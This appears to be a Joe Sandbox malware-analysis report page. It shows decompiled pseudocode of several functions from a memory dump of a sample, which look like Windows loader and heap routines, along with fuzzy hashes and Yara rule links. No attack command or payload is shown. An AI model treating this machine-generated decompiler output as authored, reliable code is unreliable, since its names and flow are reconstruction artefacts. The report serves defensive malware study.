0x01310f14
0x01310f23
0x01310f2d
0x01310f34
0x01310f34
0x01310f14
0x01310f52
0x00000000
0x00000000
0x01310f58
0x01310f73
0x01310f74
0x01310f79
0x01310f7d
0x01310f80
0x01310f86
0x01310fab
0x01310fb5
0x01310fc6
0x01310fd1
0x01310fe3
0x01310fd3
0x01310fdc
0x01310fdc
0x01310feb
0x01311009
0x01311009
0x01311015
0x01311027
0x01311017
0x01311020
0x01311020
0x0131102f
0x0131103c
0x0131103c
0x01311048
0x01311050
0x01311050
0x01311055
0x00000000
0x01311055
0x01310f88
0x01310f9e
0x01310fa2
0x01310fa9
0x00000000
0x00000000
0x00000000
0x01310fa9
0x00000000

Strings

`, xrefs: 01310F16

Memory Dump Source

Source File: 00000008.00000002.418379413.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: true

Associated: 00000008.00000002.420558775.000000000133B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.420581212.000000000133F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1220000_CV.jbxd

Similarity

API ID:
String ID: `
API String ID: 0-2679148245
Opcode ID: 3f21533747b718fa2659900502fd9075517d7dfa5486d5e7bf9adb8e0938045c
Instruction ID: 98d613a37e3fa19e1b8a40ba65f3f42278eef2a6df46d3e4ac4efc6e2d3d712a
Opcode Fuzzy Hash: 3f21533747b718fa2659900502fd9075517d7dfa5486d5e7bf9adb8e0938045c
Instruction Fuzzy Hash: A051C3717043429FE329DF28D884B6BBBE9EBC4708F04092CF68697294D770E949CB61

Uniqueness

Uniqueness Score: -1.00%

Function 0127F0BF Relevance: 1.4, Strings: 1, Instructions: 137
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E0127F0BF(signed short* __ecx, signed short __edx, void* __eflags, intOrPtr* _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char* _v20;
				intOrPtr _v24;
				char _v28;
				intOrPtr _v32;
				char _v36;
				char _v44;
				char _v52;
				intOrPtr _v56;
				char _v60;
				intOrPtr _v72;
				void* _t51;
				void* _t58;
				signed short _t82;
				short _t84;
				signed int _t91;
				signed int _t100;
				signed short* _t103;
				void* _t108;
				intOrPtr* _t109;

				_t103 = __ecx;
				_t82 = __edx;
				_t51 = E01264120(0, __ecx, 0,  &_v52, 0, 0, 0);
				if(_t51 >= 0) {
					_push(0x21);
					_push(3);
					_v56 =  *0x7ffe02dc;
					_v20 =  &_v52;
					_push( &_v44);
					_v28 = 0x18;
					_push( &_v28);
					_push(0x100020);
					_v24 = 0;
					_push( &_v60);
					_v16 = 0x40;
					_v12 = 0;
					_v8 = 0;
					_t58 = E01289830();
					_t87 =  *[fs:0x30];
					_t108 = _t58;
					L012677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v72);
					if(_t108 < 0) {
						L11:
						_t51 = _t108;
					} else {
						_push(4);
						_push(8);
						_push( &_v36);
						_push( &_v44);
						_push(_v60);
						_t108 = E01289990();
						if(_t108 < 0) {
							L10:
							_push(_v60);
							E012895D0();
							goto L11;
						} else {
							_t109 = L01264620(_t87,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t82 + 0x18);
							if(_t109 == 0) {
								_t108 = 0xc0000017;
								goto L10;
							} else {
								_t21 = _t109 + 0x18; // 0x18
								 *((intOrPtr*)(_t109 + 4)) = _v60;
								 *_t109 = 1;
								 *((intOrPtr*)(_t109 + 0x10)) = _t21;
								 *(_t109 + 0xe) = _t82;
								 *((intOrPtr*)(_t109 + 8)) = _v56;
								 *((intOrPtr*)(_t109 + 0x14)) = _v32;
								E0128F3E0(_t21, _t103[2],  *_t103 & 0x0000ffff);
								 *((short*)( *((intOrPtr*)(_t109 + 0x10)) + (( *_t103 & 0x0000ffff) >> 1) * 2)) = 0;
								 *((short*)(_t109 + 0xc)) =  *_t103;
								_t91 =  *_t103 & 0x0000ffff;
								_t100 = _t91 & 0xfffffffe;
								_t84 = 0x5c;
								if( *((intOrPtr*)(_t103[2] + _t100 - 2)) != _t84) {
									if(_t91 + 4 > ( *(_t109 + 0xe) & 0x0000ffff)) {
										_push(_v60);
										E012895D0();
										L012677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t109);
										_t51 = 0xc0000106;
									} else {
										 *((short*)(_t100 +  *((intOrPtr*)(_t109 + 0x10)))) = _t84;
										 *((short*)( *((intOrPtr*)(_t109 + 0x10)) + 2 + (( *_t103 & 0x0000ffff) >> 1) * 2)) = 0;
										 *((short*)(_t109 + 0xc)) =  *((short*)(_t109 + 0xc)) + 2;
										goto L5;
									}
								} else {
									L5:
									 *_a4 = _t109;
									_t51 = 0;
								}
							}
						}
					}
				}
				return _t51;
			}

0x0127f0d3
0x0127f0d9
0x0127f0e0
0x0127f0e7
0x0127f0f2
0x0127f0f4
0x0127f0f8
0x0127f100
0x0127f108
0x0127f10d
0x0127f115
0x0127f116
0x0127f11f
0x0127f123
0x0127f124
0x0127f12c
0x0127f130
0x0127f134
0x0127f13d
0x0127f144
0x0127f14b
0x0127f152
0x012bbab0
0x012bbab0
0x0127f158
0x0127f158
0x0127f15a
0x0127f160
0x0127f165
0x0127f166
0x0127f16f
0x0127f173
0x012bbaa7
0x012bbaa7
0x012bbaab
0x00000000
0x0127f179
0x0127f18d
0x0127f191
0x012bbaa2
0x00000000
0x0127f197
0x0127f19b
0x0127f1a2
0x0127f1a9
0x0127f1af
0x0127f1b2
0x0127f1b6
0x0127f1b9
0x0127f1c4
0x0127f1d8
0x0127f1df
0x0127f1e3
0x0127f1eb
0x0127f1ee
0x0127f1f4
0x0127f20f
0x012bbab7
0x012bbabb
0x012bbacc
0x012bbad1
0x0127f215
0x0127f218
0x0127f226
0x0127f22b
0x00000000
0x0127f22b
0x0127f1f6
0x0127f1f6
0x0127f1f9
0x0127f1fb
0x0127f1fb
0x0127f1f4
0x0127f191
0x0127f173
0x0127f152
0x0127f203

Strings

@, xrefs: 0127F124

Memory Dump Source

Source File: 00000008.00000002.418379413.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: true

Associated: 00000008.00000002.420558775.000000000133B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.420581212.000000000133F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1220000_CV.jbxd

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
Instruction ID: b0204b3678a5f7824435f514b3d5ad1491c4b72277cb02c0d1782363b382f49f
Opcode Fuzzy Hash: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
Instruction Fuzzy Hash: BD51B0715157119FC321DF18C840A6BBBF8FF88710F00892DFAA587690E7B4E944CB91

Uniqueness

Uniqueness Score: -1.00%

Function 012C3540 Relevance: 1.4, Strings: 1, Instructions: 130
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E012C3540(intOrPtr _a4) {
				signed int _v12;
				intOrPtr _v88;
				intOrPtr _v92;
				char _v96;
				char _v352;
				char _v1072;
				intOrPtr _v1140;
				intOrPtr _v1148;
				char _v1152;
				char _v1156;
				char _v1160;
				char _v1164;
				char _v1168;
				char* _v1172;
				short _v1174;
				char _v1176;
				char _v1180;
				char _v1192;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				short _t41;
				short _t42;
				intOrPtr _t80;
				intOrPtr _t81;
				signed int _t82;
				void* _t83;

				_v12 =  *0x133d360 ^ _t82;
				_t41 = 0x14;
				_v1176 = _t41;
				_t42 = 0x16;
				_v1174 = _t42;
				_v1164 = 0x100;
				_v1172 = L"BinaryHash";
				_t81 = E01280BE0(0xfffffffc,  &_v352,  &_v1164, 0, 0, 0,  &_v1192);
				if(_t81 < 0) {
					L11:
					_t75 = _t81;
					E012C3706(0, _t81, _t79, _t80);
					L12:
					if(_a4 != 0xc000047f) {
						E0128FA60( &_v1152, 0, 0x50);
						_v1152 = 0x60c201e;
						_v1148 = 1;
						_v1140 = E012C3540;
						E0128FA60( &_v1072, 0, 0x2cc);
						_push( &_v1072);
						E0129DDD0( &_v1072, _t75, _t79, _t80, _t81);
						E012D0C30(0, _t75, _t80,  &_v1152,  &_v1072, 2);
						_push(_v1152);
						_push(0xffffffff);
						E012897C0();
					}
					return E0128B640(0xc0000135, 0, _v12 ^ _t82, _t79, _t80, _t81);
				}
				_t79 =  &_v352;
				_t81 = E012C3971(0, _a4,  &_v352,  &_v1156);
				if(_t81 < 0) {
					goto L11;
				}
				_t75 = _v1156;
				_t79 =  &_v1160;
				_t81 = E012C3884(_v1156,  &_v1160,  &_v1168);
				if(_t81 >= 0) {
					_t80 = _v1160;
					E0128FA60( &_v96, 0, 0x50);
					_t83 = _t83 + 0xc;
					_push( &_v1180);
					_push(0x50);
					_push( &_v96);
					_push(2);
					_push( &_v1176);
					_push(_v1156);
					_t81 = E01289650();
					if(_t81 >= 0) {
						if(_v92 != 3 || _v88 == 0) {
							_t81 = 0xc000090b;
						}
						if(_t81 >= 0) {
							_t75 = _a4;
							_t79 =  &_v352;
							E012C3787(_a4,  &_v352, _t80);
						}
					}
					L012677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v1168);
				}
				_push(_v1156);
				E012895D0();
				if(_t81 >= 0) {
					goto L12;
				} else {
					goto L11;
				}
			}

0x012c3552
0x012c355a
0x012c355d
0x012c3566
0x012c3567
0x012c357e
0x012c358f
0x012c35a1
0x012c35a5
0x012c366b
0x012c366b
0x012c366d
0x012c3672
0x012c3679
0x012c3685
0x012c368d
0x012c369d
0x012c36a7
0x012c36b8
0x012c36c6
0x012c36c7
0x012c36dc
0x012c36e1
0x012c36e7
0x012c36e9
0x012c36e9
0x012c3703
0x012c3703
0x012c35b5
0x012c35c0
0x012c35c4
0x00000000
0x00000000
0x012c35ca
0x012c35d7
0x012c35e2
0x012c35e6
0x012c35e8
0x012c35f5
0x012c35fa
0x012c3603
0x012c3604
0x012c3609
0x012c360a
0x012c3612
0x012c3613
0x012c361e
0x012c3622
0x012c3628
0x012c362f
0x012c362f
0x012c3636
0x012c3638
0x012c363b
0x012c3642
0x012c3642
0x012c3636
0x012c3657
0x012c3657
0x012c365c
0x012c3662
0x012c3669
0x00000000
0x00000000
0x00000000
0x00000000

Strings

BinaryHash, xrefs: 012C358F

Memory Dump Source

Source File: 00000008.00000002.418379413.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: true

Associated: 00000008.00000002.420558775.000000000133B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.420581212.000000000133F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1220000_CV.jbxd

Similarity

API ID:
String ID: BinaryHash
API String ID: 0-2202222882
Opcode ID: fae951b51eafd901d879655092c141f82c1e73634760d9e96b3d3b9b3cc95e9d
Instruction ID: 60224d0b46cd4e69e9476267f85a5c0807495fcb027fe5ef4aa0b50742a42411
Opcode Fuzzy Hash: fae951b51eafd901d879655092c141f82c1e73634760d9e96b3d3b9b3cc95e9d
Instruction Fuzzy Hash: 584125B1D1152D9FDB21DA50CC80FEEB77CAB54714F1086A9E709A7241DB309E88CF98

Uniqueness

Uniqueness Score: -1.00%

Function 013105AC Relevance: 1.4, Strings: 1, Instructions: 115
COMMON

Download Yara Rule

C-Code - Quality: 71%

			E013105AC(signed int* __ecx, signed int __edx, void* __eflags, signed int _a4, signed int _a8) {
				signed int _v20;
				char _v24;
				signed int _v28;
				char _v32;
				signed int _v36;
				intOrPtr _v40;
				void* __ebx;
				void* _t35;
				signed int _t42;
				char* _t48;
				signed int _t59;
				signed char _t61;
				signed int* _t79;
				void* _t88;

				_v28 = __edx;
				_t79 = __ecx;
				if(E013107DF(__ecx, __edx,  &_a4,  &_a8, 0) == 0) {
					L13:
					_t35 = 0;
					L14:
					return _t35;
				}
				_t61 = __ecx[1];
				_t59 = __ecx[0xf];
				_v32 = (_a4 << 0xc) + (__edx - ( *__ecx & __edx) >> 4 << _t61) + ( *__ecx & __edx);
				_v36 = _a8 << 0xc;
				_t42 =  *(_t59 + 0xc) & 0x40000000;
				asm("sbb esi, esi");
				_t88 = ( ~_t42 & 0x0000003c) + 4;
				if(_t42 != 0) {
					_push(0);
					_push(0x14);
					_push( &_v24);
					_push(3);
					_push(_t59);
					_push(0xffffffff);
					if(E01289730() < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t59) {
						_push(_t61);
						E0130A80D(_t59, 1, _v20, 0);
						_t88 = 4;
					}
				}
				_t35 = E0130A854( &_v32,  &_v36, 0, 0x1000, _t88, 0,  *((intOrPtr*)(_t79 + 0x34)),  *((intOrPtr*)(_t79 + 0x38)));
				if(_t35 < 0) {
					goto L14;
				}
				E01311293(_t79, _v40, E013107DF(_t79, _v28,  &_a4,  &_a8, 1));
				if(E01267D50() == 0) {
					_t48 = 0x7ffe0380;
				} else {
					_t48 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
				}
				if( *_t48 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
					E0130138A(_t59,  *((intOrPtr*)(_t79 + 0x3c)), _v32, _v36, 0xa);
				}
				goto L13;
			}

0x013105c5
0x013105ca
0x013105d3
0x013106db
0x013106db
0x013106dd
0x013106e3
0x013106e3
0x013105dd
0x013105e7
0x013105f6
0x01310600
0x01310607
0x01310610
0x01310615
0x0131061a
0x0131061c
0x0131061e
0x01310624
0x01310625
0x01310627
0x01310628
0x01310631
0x01310640
0x0131064d
0x01310654
0x01310654
0x01310631
0x0131066d
0x01310674
0x00000000
0x00000000
0x01310692
0x0131069e
0x013106b0
0x013106a0
0x013106a9
0x013106a9
0x013106b8
0x013106d6
0x013106d6
0x00000000

Strings

`, xrefs: 01310633

Memory Dump Source

Source File: 00000008.00000002.418379413.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: true

Associated: 00000008.00000002.420558775.000000000133B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.420581212.000000000133F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1220000_CV.jbxd

Similarity

API ID:
String ID: `
API String ID: 0-2679148245
Opcode ID: 39b8bc2de1f442ef1f569125be10905dd0dd778863a6d43cfec09233fd0d58f3
Instruction ID: 443a7871eb51b1c571a69db6e17c63a5773ad84416b6552eeb88faad435130c3
Opcode Fuzzy Hash: 39b8bc2de1f442ef1f569125be10905dd0dd778863a6d43cfec09233fd0d58f3
Instruction Fuzzy Hash: CF31E2322043066BE718DE28CC44F967BD9EB84768F144629FA54EB2C4D670E944C791

Uniqueness

Uniqueness Score: -1.00%

Function 012C3884 Relevance: 1.3, Strings: 1, Instructions: 95
COMMON

Download Yara Rule

C-Code - Quality: 72%

			E012C3884(intOrPtr __ecx, intOrPtr* __edx, intOrPtr* _a4) {
				char _v8;
				intOrPtr _v12;
				intOrPtr* _v16;
				char* _v20;
				short _v22;
				char _v24;
				intOrPtr _t38;
				short _t40;
				short _t41;
				void* _t44;
				intOrPtr _t47;
				void* _t48;

				_v16 = __edx;
				_t40 = 0x14;
				_v24 = _t40;
				_t41 = 0x16;
				_v22 = _t41;
				_t38 = 0;
				_v12 = __ecx;
				_push( &_v8);
				_push(0);
				_push(0);
				_push(2);
				_t43 =  &_v24;
				_v20 = L"BinaryName";
				_push( &_v24);
				_push(__ecx);
				_t47 = 0;
				_t48 = E01289650();
				if(_t48 >= 0) {
					_t48 = 0xc000090b;
				}
				if(_t48 != 0xc0000023) {
					_t44 = 0;
					L13:
					if(_t48 < 0) {
						L16:
						if(_t47 != 0) {
							L012677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t44, _t47);
						}
						L18:
						return _t48;
					}
					 *_v16 = _t38;
					 *_a4 = _t47;
					goto L18;
				}
				_t47 = L01264620(_t43,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v8);
				if(_t47 != 0) {
					_push( &_v8);
					_push(_v8);
					_push(_t47);
					_push(2);
					_push( &_v24);
					_push(_v12);
					_t48 = E01289650();
					if(_t48 < 0) {
						_t44 = 0;
						goto L16;
					}
					if( *((intOrPtr*)(_t47 + 4)) != 1 ||  *(_t47 + 8) < 4) {
						_t48 = 0xc000090b;
					}
					_t44 = 0;
					if(_t48 < 0) {
						goto L16;
					} else {
						_t17 = _t47 + 0xc; // 0xc
						_t38 = _t17;
						if( *((intOrPtr*)(_t38 + ( *(_t47 + 8) >> 1) * 2 - 2)) != 0) {
							_t48 = 0xc000090b;
						}
						goto L13;
					}
				}
				_t48 = _t48 + 0xfffffff4;
				goto L18;
			}

0x012c3893
0x012c3896
0x012c3899
0x012c389f
0x012c38a0
0x012c38a4
0x012c38a9
0x012c38ac
0x012c38ad
0x012c38ae
0x012c38af
0x012c38b1
0x012c38b4
0x012c38bb
0x012c38bc
0x012c38bd
0x012c38c4
0x012c38c8
0x012c38ca
0x012c38ca
0x012c38d5
0x012c393e
0x012c3940
0x012c3942
0x012c3952
0x012c3954
0x012c3961
0x012c3961
0x012c3967
0x012c396e
0x012c396e
0x012c3947
0x012c394c
0x00000000
0x012c394c
0x012c38ea
0x012c38ee
0x012c38f8
0x012c38f9
0x012c38ff
0x012c3900
0x012c3902
0x012c3903
0x012c390b
0x012c390f
0x012c3950
0x00000000
0x012c3950
0x012c3915
0x012c391d
0x012c391d
0x012c3922
0x012c3926
0x00000000
0x012c3928
0x012c392b
0x012c392b
0x012c3935
0x012c3937
0x012c3937
0x00000000
0x012c3935
0x012c3926
0x012c38f0
0x00000000

Strings

BinaryName, xrefs: 012C38B4

Memory Dump Source

Source File: 00000008.00000002.418379413.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: true

Associated: 00000008.00000002.420558775.000000000133B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.420581212.000000000133F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1220000_CV.jbxd

Similarity

API ID:
String ID: BinaryName
API String ID: 0-215506332
Opcode ID: c137dae90e228f495822522a3d7f1c3e0836d3be3c695d3b8ca0930e1fb7164f
Instruction ID: fec9c818116fcde670d7b514c4df39074a87893f9de3c2f74e4b59deed48407c
Opcode Fuzzy Hash: c137dae90e228f495822522a3d7f1c3e0836d3be3c695d3b8ca0930e1fb7164f
Instruction Fuzzy Hash: F431E53291151AEFDB15DA58C945DBFBB74FB80B20F01866DEB15A7290D7309E40C7A1

Uniqueness

Uniqueness Score: -1.00%

Function 0127D294 Relevance: 1.3, Strings: 1, Instructions: 93
COMMON

Download Yara Rule

C-Code - Quality: 33%

			E0127D294(void* __ecx, char __edx, void* __eflags) {
				signed int _v8;
				char _v52;
				signed int _v56;
				signed int _v60;
				intOrPtr _v64;
				char* _v68;
				intOrPtr _v72;
				char _v76;
				signed int _v84;
				intOrPtr _v88;
				char _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				char _v104;
				char _v105;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t35;
				char _t38;
				signed int _t40;
				signed int _t44;
				signed int _t52;
				void* _t53;
				void* _t55;
				void* _t61;
				intOrPtr _t62;
				void* _t64;
				signed int _t65;
				signed int _t66;

				_t68 = (_t66 & 0xfffffff8) - 0x6c;
				_v8 =  *0x133d360 ^ (_t66 & 0xfffffff8) - 0x0000006c;
				_v105 = __edx;
				_push( &_v92);
				_t52 = 0;
				_push(0);
				_push(0);
				_push( &_v104);
				_push(0);
				_t59 = __ecx;
				_t55 = 2;
				if(E01264120(_t55, __ecx) < 0) {
					_t35 = 0;
					L8:
					_pop(_t61);
					_pop(_t64);
					_pop(_t53);
					return E0128B640(_t35, _t53, _v8 ^ _t68, _t59, _t61, _t64);
				}
				_v96 = _v100;
				_t38 = _v92;
				if(_t38 != 0) {
					_v104 = _t38;
					_v100 = _v88;
					_t40 = _v84;
				} else {
					_t40 = 0;
				}
				_v72 = _t40;
				_v68 =  &_v104;
				_push( &_v52);
				_v76 = 0x18;
				_push( &_v76);
				_v64 = 0x40;
				_v60 = _t52;
				_v56 = _t52;
				_t44 = E012898D0();
				_t62 = _v88;
				_t65 = _t44;
				if(_t62 != 0) {
					asm("lock xadd [edi], eax");
					if((_t44 | 0xffffffff) != 0) {
						goto L4;
					}
					_push( *((intOrPtr*)(_t62 + 4)));
					E012895D0();
					L012677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t52, _t62);
					goto L4;
				} else {
					L4:
					L012677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t52, _v96);
					if(_t65 >= 0) {
						_t52 = 1;
					} else {
						if(_t65 == 0xc0000043 || _t65 == 0xc0000022) {
							_t52 = _t52 & 0xffffff00 | _v105 != _t52;
						}
					}
					_t35 = _t52;
					goto L8;
				}
			}

0x0127d29c
0x0127d2a6
0x0127d2b1
0x0127d2b5
0x0127d2b6
0x0127d2bc
0x0127d2bd
0x0127d2be
0x0127d2bf
0x0127d2c2
0x0127d2c4
0x0127d2cc
0x0127d384
0x0127d34b
0x0127d34f
0x0127d350
0x0127d351
0x0127d35c
0x0127d35c
0x0127d2d6
0x0127d2da
0x0127d2e1
0x0127d361
0x0127d369
0x0127d36d
0x0127d2e3
0x0127d2e3
0x0127d2e3
0x0127d2e5
0x0127d2ed
0x0127d2f5
0x0127d2fa
0x0127d302
0x0127d303
0x0127d30b
0x0127d30f
0x0127d313
0x0127d318
0x0127d31c
0x0127d320
0x0127d379
0x0127d37d
0x00000000
0x00000000
0x012baffe
0x012bb001
0x012bb011
0x00000000
0x0127d322
0x0127d322
0x0127d330
0x0127d337
0x0127d35d
0x0127d339
0x0127d33f
0x0127d38c
0x0127d38c
0x0127d33f
0x0127d349
0x00000000
0x0127d349

Strings

@, xrefs: 0127D303

Memory Dump Source

Source File: 00000008.00000002.418379413.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: true

Associated: 00000008.00000002.420558775.000000000133B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.420581212.000000000133F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1220000_CV.jbxd

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: 9530731e789499f5e0de6da9109ea8161316e175af081a564a0486a8ec3cea3e
Instruction ID: f7504a33ecf0f2e065aff9310605b9fee429fe76b9b6456a6b2e6d62d6273445
Opcode Fuzzy Hash: 9530731e789499f5e0de6da9109ea8161316e175af081a564a0486a8ec3cea3e
Instruction Fuzzy Hash: DE31C2B156930A9FC711DF68C881AABBBE8EFC5754F00092EF99583250D634ED44CFA2

Uniqueness

Uniqueness Score: -1.00%

Function 01251B8F Relevance: 1.3, Strings: 1, Instructions: 86
COMMON

Download Yara Rule

C-Code - Quality: 72%

			E01251B8F(void* __ecx, intOrPtr __edx, intOrPtr* _a4, signed int* _a8) {
				intOrPtr _v8;
				char _v16;
				intOrPtr* _t26;
				intOrPtr _t29;
				void* _t30;
				signed int _t31;

				_t27 = __ecx;
				_t29 = __edx;
				_t31 = 0;
				_v8 = __edx;
				if(__edx == 0) {
					L18:
					_t30 = 0xc000000d;
					goto L12;
				} else {
					_t26 = _a4;
					if(_t26 == 0 || _a8 == 0 || __ecx == 0) {
						goto L18;
					} else {
						E0128BB40(__ecx,  &_v16, __ecx);
						_push(_t26);
						_push(0);
						_push(0);
						_push(_t29);
						_push( &_v16);
						_t30 = E0128A9B0();
						if(_t30 >= 0) {
							_t19 =  *_t26;
							if( *_t26 != 0) {
								goto L7;
							} else {
								 *_a8 =  *_a8 & 0;
							}
						} else {
							if(_t30 != 0xc0000023) {
								L9:
								_push(_t26);
								_push( *_t26);
								_push(_t31);
								_push(_v8);
								_push( &_v16);
								_t30 = E0128A9B0();
								if(_t30 < 0) {
									L12:
									if(_t31 != 0) {
										L012677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t31);
									}
								} else {
									 *_a8 = _t31;
								}
							} else {
								_t19 =  *_t26;
								if( *_t26 == 0) {
									_t31 = 0;
								} else {
									L7:
									_t31 = L01264620(_t27,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t19);
								}
								if(_t31 == 0) {
									_t30 = 0xc0000017;
								} else {
									goto L9;
								}
							}
						}
					}
				}
				return _t30;
			}

0x01251b8f
0x01251b9a
0x01251b9c
0x01251b9e
0x01251ba3
0x012a7010
0x012a7010
0x00000000
0x01251ba9
0x01251ba9
0x01251bae
0x00000000
0x01251bc5
0x01251bca
0x01251bcf
0x01251bd0
0x01251bd1
0x01251bd2
0x01251bd6
0x01251bdc
0x01251be0
0x012a6ffc
0x012a7000
0x00000000
0x012a7006
0x012a7009
0x012a7009
0x01251be6
0x01251bec
0x01251c0b
0x01251c0b
0x01251c0c
0x01251c11
0x01251c12
0x01251c15
0x01251c1b
0x01251c1f
0x01251c31
0x01251c33
0x012a7026
0x012a7026
0x01251c21
0x01251c24
0x01251c24
0x01251bee
0x01251bee
0x01251bf2
0x01251c3a
0x01251bf4
0x01251bf4
0x01251c05
0x01251c05
0x01251c09
0x01251c3e
0x00000000
0x00000000
0x00000000
0x01251c09
0x01251bec
0x01251be0
0x01251bae
0x01251c2e

Strings

WindowsExcludedProcs, xrefs: 01251BC5

Memory Dump Source

Source File: 00000008.00000002.418379413.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: true

Associated: 00000008.00000002.420558775.000000000133B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.420581212.000000000133F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1220000_CV.jbxd

Similarity

API ID:
String ID: WindowsExcludedProcs
API String ID: 0-3583428290
Opcode ID: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
Instruction ID: c194b31cef1393fe0c6deca75963e01813a35bf9ea7eb84cf019fc5c0341dfba
Opcode Fuzzy Hash: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
Instruction Fuzzy Hash: CF21073A57122AABDB629A59C8C0F6FBBADEF41B51F054425FF049B200D636DC10C7A1

Uniqueness

Uniqueness Score: -1.00%

Function 0126F716 Relevance: 1.3, Strings: 1, Instructions: 71
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0126F716(signed int __ecx, void* __edx, intOrPtr _a4, intOrPtr* _a8) {
				intOrPtr _t13;
				intOrPtr _t14;
				signed int _t16;
				signed char _t17;
				intOrPtr _t19;
				intOrPtr _t21;
				intOrPtr _t23;
				intOrPtr* _t25;

				_t25 = _a8;
				_t17 = __ecx;
				if(_t25 == 0) {
					_t19 = 0xc00000f2;
					L8:
					return _t19;
				}
				if((__ecx & 0xfffffffe) != 0) {
					_t19 = 0xc00000ef;
					goto L8;
				}
				_t19 = 0;
				 *_t25 = 0;
				_t21 = 0;
				_t23 = "Actx ";
				if(__edx != 0) {
					if(__edx == 0xfffffffc) {
						L21:
						_t21 = 0x200;
						L5:
						_t13 =  *((intOrPtr*)( *[fs:0x30] + _t21));
						 *_t25 = _t13;
						L6:
						if(_t13 == 0) {
							if((_t17 & 0x00000001) != 0) {
								 *_t25 = _t23;
							}
						}
						L7:
						goto L8;
					}
					if(__edx == 0xfffffffd) {
						 *_t25 = _t23;
						_t13 = _t23;
						goto L6;
					}
					_t13 =  *((intOrPtr*)(__edx + 0x10));
					 *_t25 = _t13;
					L14:
					if(_t21 == 0) {
						goto L6;
					}
					goto L5;
				}
				_t14 = _a4;
				if(_t14 != 0) {
					_t16 =  *(_t14 + 0x14) & 0x00000007;
					if(_t16 <= 1) {
						_t21 = 0x1f8;
						_t13 = 0;
						goto L14;
					}
					if(_t16 == 2) {
						goto L21;
					}
					if(_t16 != 4) {
						_t19 = 0xc00000f0;
						goto L7;
					}
					_t13 = 0;
					goto L6;
				} else {
					_t21 = 0x1f8;
					goto L5;
				}
			}

0x0126f71d
0x0126f722
0x0126f726
0x012b4770
0x0126f765
0x0126f769
0x0126f769
0x0126f732
0x012b477a
0x00000000
0x012b477a
0x0126f738
0x0126f73a
0x0126f73c
0x0126f73f
0x0126f746
0x0126f778
0x0126f7a9
0x0126f7a9
0x0126f754
0x0126f75a
0x0126f75d
0x0126f75f
0x0126f761
0x0126f76f
0x0126f771
0x0126f771
0x0126f76f
0x0126f763
0x00000000
0x0126f763
0x0126f77d
0x0126f7a3
0x0126f7a5
0x00000000
0x0126f7a5
0x0126f77f
0x0126f782
0x0126f784
0x0126f786
0x00000000
0x00000000
0x00000000
0x0126f788
0x0126f748
0x0126f74d
0x0126f78d
0x0126f793
0x0126f7b7
0x0126f7bc
0x00000000
0x0126f7bc
0x0126f798
0x00000000
0x00000000
0x0126f79d
0x0126f7b0
0x00000000
0x0126f7b0
0x0126f79f
0x00000000
0x0126f74f
0x0126f74f
0x00000000
0x0126f74f

Strings

Actx , xrefs: 0126F73F

Memory Dump Source

Source File: 00000008.00000002.418379413.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: true

Associated: 00000008.00000002.420558775.000000000133B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.420581212.000000000133F000.00000040.00000800.00020000.00000000.sdmpDownload File

